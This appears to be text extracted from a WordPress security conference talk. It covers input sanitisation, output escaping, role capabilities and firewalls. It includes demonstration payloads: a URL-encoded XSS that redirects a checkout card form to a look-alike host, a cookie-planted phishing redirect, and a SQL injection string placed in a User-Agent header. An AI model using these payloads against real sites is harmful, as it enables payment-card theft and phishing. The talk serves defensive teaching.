The Enterprise Approach to WordPress Security.

No content

No content

No content

Body Level One Body Level Two Body Level Three 10up @10up Feb 11, 2021 Excited and honored to share our part in launching the new White House website (powered by #WordPress) and to be highlighted by @FastCompany as the WhiteHouse.gov development partner: 10up.com/blog/2021/10up…

No content

No content

No content

No content

© Christoph Scholz, 2016 • Hacker IT Computer Security • flic.kr/p/HUTQEu •

© Sheri Bigelow, 2015 • 2015 WordPress Community Summit • flic.kr/p/BKTjfm •

© Sheri Bigelow, 2015 • 2015 WordPress Community Summit • flic.kr/p/BKTjfm • Not actually Hackers (WordPress Core Contributors)

No content

© Andy Rogers, 2012 • Server Room • flic.kr/p/d5WcJs •

Why do sites get hacked?

People don’t know what they don’t know

Popular Plugin Developer Resources

Popular Plugin Developer Resources

Popular Plugin Developer Resources

Untrustworthy input

This week only! We’ve got a special on Pears, available to our Twitter followers only. http://green-family-grocer.local/fruit-and... Green Family Grocers @green_family_grocers 25 August 2023

No content

/* * Use a query string parameter to set a cookie * * On all pages of the site, check if the query string * parameter `gfg_discount_code` is set. * If so, set a cookie named `gfg_discount_code` with the * value of the `gfg_discount_code` parameter. * * The cookie should expire in 10 years time. */ if ( isset( $_GET['gfg_discount_code'] ) ) {

if ( isset( $_GET['gfg_discount_code'] ) ) { // Delete cookie if the value is falsey if ( ! $_GET['gfg_discount_code'] ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); } else { // Set a cookie with the value of the parameter. setcookie( 'gfg_discount_code', wp_unslash( $_GET['gfg_discount_code'] ), time() + ( 10 * YEAR_IN_SECONDS ), '/' ); } } GitHub Copilot

People don’t know what they don’t know

People don’t know what they don’t know Natural language models learn from people

// Check if the discount code is set. if ( gfg_get_discount_code() ) { // If it is, display a custom message. ?>

This week only! We’ve got a special on Pears, available to our Twitter followers only. http://green-family-grocer.local/fruit-and... Green Family Grocers @green_family_grocers 25 August 2023

This week only! We’ve got a special on Pairs, available to our Twitter followers only. http://green-family-grocer.local/fruit-and... Green Family Grocers @SCARLETT_FAMILY_GROCERS 25 August 2023

No content

https://green-family-grocer.local/fruit-and-veg/pears/? gfg_discount_code=WCSyd%3Cscript%3E%20%20wind ow.onload%20=%20() %20=%3E%20%7B%20%20%20const%20el%20=%20 document.getElementById(%20%27gfc-credit-card- form%27%20);%20%20%20if%20(el) %20%7B%20%20%20%20el.setAttribute(%20%27actio n%27,%20%27https://scarlett-family-grocer.local/ checkout/thank-you/%27); %20%20%20%7D%20%20%7D%20%20%3C/ script%3E

WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } }

WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } }

WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } }

// Check if the discount code is set. if ( gfg_get_discount_code() ) { // If it is, display a custom message. ?>

eck if the discount code is set. gfg_get_discount_code() ) { / If it is, display a custom message. > div >

Discount code applied!

/div> ?php

Always Escape late It is best to do the output escaping as late as possible, ideally as data is being outputted. developer.wordpress.org/apis/security/escaping

eck if the discount code is set. gfg_get_discount_code() ) { / If it is, display a custom message. > div >

Discount code applied!

/div> ?php

Discount code applied! WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } }

WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } }

$discount_code = sanitize_text_field( wp_unslash( $_GET['gfg_discount_code'] ) ); // Delete cookie if the value is falsey if ( ! $discount_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); } else { // Set a cookie with the value of the parameter. setcookie( 'gfg_discount_code', $discount_code, time() + ( 10 * YEAR_IN_SECONDS ), '/' ); }

Always Sanitize Input Remember: Even admins are users, and users will enter incorrect data, either on purpose or accidentally. It’s your job to protect them from themselves. developer.wordpress.org/apis/security/sanitizing/

Discount code applied! WCSyd

When is data untrustworthy?

All form data is untrustworthy Even hidden fields and JavaScript validated data

All form data is untrustworthy Even hidden fields and JavaScript validated data

All form data is untrustworthy Even hidden fields and JavaScript validated data Discount code applied! WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } }

Discount code applied! WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } }

Discount code applied! WCSyd window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } }

$discount_code = sanitize_text_field( wp_unslash( $_GET['gfg_discount_code'] ) ); // Delete cookie if the value is falsey if ( ! $discount_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); } else { // Set a cookie with the value of the parameter. setcookie( 'gfg_discount_code', $discount_code, time() + ( 10 * YEAR_IN_SECONDS ), '/' ); }

Cookies are user data!

HTTP headers are user data!

Session and local storage values are user data!

Everything that comes from the browser is untrustworthy

You’d have a go, right?! (By the way, if my manager is in the room — I didn’t really leave my computer open for house keeping)

Discount code applied! WCSydlocation.href="https://my- phishing-site.com"

nasty = document.createElement( 'script' ); nasty.src="/wp-includes/js/utils.js?ver=6.3" document.documentElement.insertBefore( nasty, document.body ); wpCookies.set( 'gfg_discount_code', 'WCSydlocation.href="https://my-phishing- site.com"', 10000000, '/' );

// If the cookie `gfg_discount_code` is set, return that value. if ( isset( $_COOKIE['gfg_discount_code'] ) ) { $discount_code = sanitize_text_field( wp_unslash( $_COOKIE['gfg_discount_code'] ) ); $unsanitized_code = wp_unslash( $_COOKIE['gfg_discount_code'] ); // Clear discount code if the values differ. if ( $discount_code !== $unsanitized_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); return false; } return $discount_code; }

// If the cookie `gfg_discount_code` is set, return that value. if ( isset( $_COOKIE['gfg_discount_code'] ) ) { $discount_code = sanitize_text_field( wp_unslash( $_COOKIE['gfg_discount_code'] ) ); $unsanitized_code = wp_unslash( $_COOKIE['gfg_discount_code'] ); // Clear discount code if the values differ. if ( $discount_code !== $unsanitized_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); return false; } return $discount_code; }

Escaping and Sanitization is really, really nuanced

Google: wordpress common apis sanitization wordpress common apis escaping

// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized $user_input = wp_unslash( $_POST['user_input'] ); // Check the user input is valid: if ( ! valid_input( $user_input ) ) { return false; } // Do something with the user input.

// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized $user_input = wp_unslash( $_POST['user_input'] ); // Check the user input is valid: if ( ! valid_input( $user_input ) ) { return false; } // Do something with the user input.

Don’t offload your responsibilities to software

HTML Allow List

No content

Lower privileged users are limited to a sub-set of HTML

'address' => array(), 'a' => array( 'href' => true, 'rel' => true, 'rev' => true, 'name' => true, 'target' => true, 'download' => array( 'valueless' => 'y', ), ), 'abbr' => array(), 'acronym' => array(), 'area' => array( 'alt' => true, 'coords' => true, 'href' => true, 'nohref' => true, 'shape' => true, 'target' => true, ), 'article' => array( 'align' => true, ), 'aside' => array( 'align' => true, ), 'audio' => array( 'autoplay' => true, 'controls' => true, 'loop' => true, 'muted' => true, 'preload' => true, 'src' => true, ), 'b' => array(), 'bdo' => array(), 'big' => array(), 'blockquote' => array( 'cite' => true, ), 'br' => array(), 'button' => array( 'disabled' => true, 'name' => true, 'type' => true, 'value' => true, ), 'caption' => array( 'align' => true, ), 'cite' => array(), 'code' => array(), 'col' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'colgroup' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'del' => array( 'datetime' => true, ), 'dd' => array(), 'dfn' => array(), 'details' => array( 'align' => true, 'open' => true, ), 'div' => array( 'align' => true, ), 'dl' => array(), 'dt' => array(), 'em' => array(), 'fieldset' => array(), 'figure' => array( 'align' => true, ), 'figcaption' => array( 'align' => true, ), 'font' => array( 'color' => true, 'face' => true, 'size' => true, ), 'footer' => array( 'align' => true, ), 'h1' => array( 'align' => true, ), 'h2' => array( 'align' => true, ), 'h3' => array( 'align' => true, ), 'h4' => array( 'align' => true, ), 'h5' => array( 'align' => true, ), 'h6' => array( 'align' => true, ), 'header' => array( 'align' => true, ), 'hgroup' => array( 'align' => true, ), 'hr' => array( 'align' => true, 'noshade' => true, 'size' => true, 'width' => true, ), 'i' => array(), 'img' => array( 'alt' => true, 'align' => true, 'border' => true, 'height' => true, 'hspace' => true, 'loading' => true, 'longdesc' => true, 'vspace' => true, 'src' => true, 'usemap' => true, 'width' => true, ), 'ins' => array( 'datetime' => true, 'cite' => true, ), 'kbd' => array(), 'label' => array( 'for' => true, ), 'legend' => array( 'align' => true, ), 'li' => array( 'align' => true, 'value' => true, ), 'main' => array( 'align' => true, ), 'map' => array( 'name' => true, ), 'mark' => array(), 'menu' => array( 'type' => true, ), 'nav' => array( 'align' => true, ), 'object' => array( 'data' => array( 'required' => true, 'value_callback' => '_wp_kses_allow_pdf_objects', ), 'type' => array( 'required' => true, 'values' => array( 'application/pdf' ), ), ), 'p' => array( 'align' => true, ), 'pre' => array( 'width' => true, ), 'q' => array( 'cite' => true, ), 'rb' => array(), 'rp' => array(), 'rt' => array(), 'rtc' => array(), 'ruby' => array(), 's' => array(), 'samp' => array(), 'span' => array( 'align' => true, ), 'section' => array( 'align' => true, ), 'small' => array(), 'strike' => array(), 'strong' => array(), 'sub' => array(), 'summary' => array( 'align' => true, ), 'sup' => array(), 'table' => array( 'align' => true, 'bgcolor' => true, 'border' => true, 'cellpadding' => true, 'cellspacing' => true, 'rules' => true, 'summary' => true, 'width' => true, ), 'tbody' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'td' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'textarea' => array( 'cols' => true, 'rows' => true, 'disabled' => true, 'name' => true, 'readonly' => true, ), 'tfoot' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'th' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'thead' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'title' => array(), 'tr' => array( 'align' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'track' => array( 'default' => true, 'kind' => true, 'label' => true, 'src' => true, 'srclang' => true, ), 'tt' => array(), 'u' => array(), 'ul' => array( 'type' => true, ), 'ol' => array( 'start' => true, 'type' => true, 'reversed' => true, ), 'var' => array(), 'video' => array( 'autoplay' => true, 'controls' => true, 'height' => true, 'loop' => true, 'muted' => true, 'playsinline' => true, 'poster' => true, 'preload' => true, 'src' => true, 'width' => true, ), $allowedposttags = array( );

No content

define( 'DISALLOW_UNFILTERED_HTML', true );

define( 'DISALLOW_UNFILTERED_HTML', true );

No content

No content

'address' => array(), 'a' => array( 'href' => true, 'rel' => true, 'rev' => true, 'name' => true, 'target' => true, 'download' => array( 'valueless' => 'y', ), ), 'abbr' => array(), 'acronym' => array(), 'area' => array( 'alt' => true, 'coords' => true, 'href' => true, 'nohref' => true, 'shape' => true, 'target' => true, ), 'article' => array( 'align' => true, ), 'aside' => array( 'align' => true, ), 'audio' => array( 'autoplay' => true, 'controls' => true, 'loop' => true, 'muted' => true, 'preload' => true, 'src' => true, ), 'b' => array(), 'bdo' => array(), 'big' => array(), 'blockquote' => array( 'cite' => true, ), 'br' => array(), 'button' => array( 'disabled' => true, 'name' => true, 'type' => true, 'value' => true, ), 'caption' => array( 'align' => true, ), 'cite' => array(), 'code' => array(), 'col' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'colgroup' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'del' => array( 'datetime' => true, ), 'dd' => array(), 'dfn' => array(), 'details' => array( 'align' => true, 'open' => true, ), 'div' => array( 'align' => true, ), 'dl' => array(), 'dt' => array(), 'em' => array(), 'fieldset' => array(), 'figure' => array( 'align' => true, ), 'figcaption' => array( 'align' => true, ), 'font' => array( 'color' => true, 'face' => true, 'size' => true, ), 'footer' => array( 'align' => true, ), 'h1' => array( 'align' => true, ), 'h2' => array( 'align' => true, ), 'h3' => array( 'align' => true, ), 'h4' => array( 'align' => true, ), 'h5' => array( 'align' => true, ), 'h6' => array( 'align' => true, ), 'header' => array( 'align' => true, ), 'hgroup' => array( 'align' => true, ), 'hr' => array( 'align' => true, 'noshade' => true, 'size' => true, 'width' => true, ), 'i' => array(), 'img' => array( 'alt' => true, 'align' => true, 'border' => true, 'height' => true, 'hspace' => true, 'loading' => true, 'longdesc' => true, 'vspace' => true, 'src' => true, 'usemap' => true, 'width' => true, ), 'ins' => array( 'datetime' => true, 'cite' => true, ), 'kbd' => array(), 'label' => array( 'for' => true, ), 'legend' => array( 'align' => true, ), 'li' => array( 'align' => true, 'value' => true, ), 'main' => array( 'align' => true, ), 'map' => array( 'name' => true, ), 'mark' => array(), 'menu' => array( 'type' => true, ), 'nav' => array( 'align' => true, ), 'object' => array( 'data' => array( 'required' => true, 'value_callback' => '_wp_kses_allow_pdf_objects', ), 'type' => array( 'required' => true, 'values' => array( 'application/pdf' ), ), ), 'p' => array( 'align' => true, ), 'pre' => array( 'width' => true, ), 'q' => array( 'cite' => true, ), 'rb' => array(), 'rp' => array(), 'rt' => array(), 'rtc' => array(), 'ruby' => array(), 's' => array(), 'samp' => array(), 'span' => array( 'align' => true, ), 'section' => array( 'align' => true, ), 'small' => array(), 'strike' => array(), 'strong' => array(), 'sub' => array(), 'summary' => array( 'align' => true, ), 'sup' => array(), 'table' => array( 'align' => true, 'bgcolor' => true, 'border' => true, 'cellpadding' => true, 'cellspacing' => true, 'rules' => true, 'summary' => true, 'width' => true, ), 'tbody' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'td' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'textarea' => array( 'cols' => true, 'rows' => true, 'disabled' => true, 'name' => true, 'readonly' => true, ), 'tfoot' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'th' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'thead' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'title' => array(), 'tr' => array( 'align' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'track' => array( 'default' => true, 'kind' => true, 'label' => true, 'src' => true, 'srclang' => true, ), 'tt' => array(), 'u' => array(), 'ul' => array( 'type' => true, ), 'ol' => array( 'start' => true, 'type' => true, 'reversed' => true, ), 'var' => array(), 'video' => array( 'autoplay' => true, 'controls' => true, 'height' => true, 'loop' => true, 'muted' => true, 'playsinline' => true, 'poster' => true, 'preload' => true, 'src' => true, 'width' => true, ), $allowedposttags = array( );

Allowed HTML tags • Links • Block quotes • Bold • Italics • Headings • Lists • Paragraphs and line breaks

Taylor Swift — Look What You Made Me Do “I don't trust nobody & nobody trusts me”

Taylor Swift — Look What You Made Me Do “I don't trust nobody & nobody trusts me”

No content

Aside on
 job security Presume Test Content Is Public

Aside on
 job security Lorem ipsum dolor sit amet, consectetur adipiscing elit

Aside on
 job security Swearem ipsum Automatic el desarrollador de Wordpress

Permissions

WordPress Roles • High privileged • Super admin (multisite only) • Administrator • Editor • Low privileged • Author • Contributor • No privileged • Subscriber

Capabilities

No content

No content

No content

foreach ( $editor_caps as $editor_cap => $permission ) { if ( ! str_ends_with( $editor_cap, '_posts' ) && ! str_ends_with( $editor_cap, '_pages' ) ) { continue; } $new_cap = substr( $editor_cap, 0, -5 ) . 'presidential_' . substr( $editor_cap, -5 ); $presidential_editor_caps[ $new_cap ] = $permission; } /* Add the new WHGov Presidential Editor role. */

function meta_caps_posts( $caps, $cap, $user_id, $args ) { if ( in_array( 'do_not_allow', $caps, true ) || ! str_ends_with( $cap, '_post' ) ) { // Irrelevant cap or cap is explicitly denied. return $caps; } $post_is_presidential = true; /* ... but more */ if ( ! $post_is_presidential ) { return $caps; } foreach ( $caps as $required_cap ) { if ( ! str_ends_with( $required_cap, '_posts' ) && ! str_ends_with( $required_cap, '_pages' )

return $caps; } foreach ( $caps as $required_cap ) { if ( ! str_ends_with( $required_cap, '_posts' ) && ! str_ends_with( $required_cap, '_pages' ) ) { continue; } $caps[] = substr( $required_cap, 0, -5 ) . 'presidential_' . substr( $required_cap, -5 ); } return $caps; } add_filter( 'map_meta_cap', __NAMESPACE__ . '\\meta_caps_posts', 10,

No content

Hosting

Who’s the best host if you want … ?

Who’s the best host if you want to keep your site secure?

Who’s the best host if you want to keep your site secure?

No

$ dig 10up.com ;; ANSWER SECTION: 10up.com. 300 IN A 104.24.183.3 10up.com. 300 IN A 172.67.82.235 10up.com. 300 IN A 104.24.182.3 ;; Query time: 68 msec ;; SERVER: 192.168.128.1#53(192.168.128.1) ;; WHEN: Thu Aug 17 12:11:03 EDT 2023 ;; MSG SIZE rcvd: 85

No content

MSIE 6.0" OR 1 = (SELECT sleep(10)); -- ...

MSIE 6.0" OR 1 = (SELECT sleep(10)); -- ...

No content

No content

No content

No content

Web Application Firewalls

© David Howard, 2015 • no entry • flic.kr/p/GHJRZy •

Never expose your WordPress Servers IP address to the internet

The one simple trick…

…is that it’s not simple.

No content

© Kristina Kuncevich, 2013 • Sleep • flic.kr/p/fvNQYZ •

I’ve made a huge mistake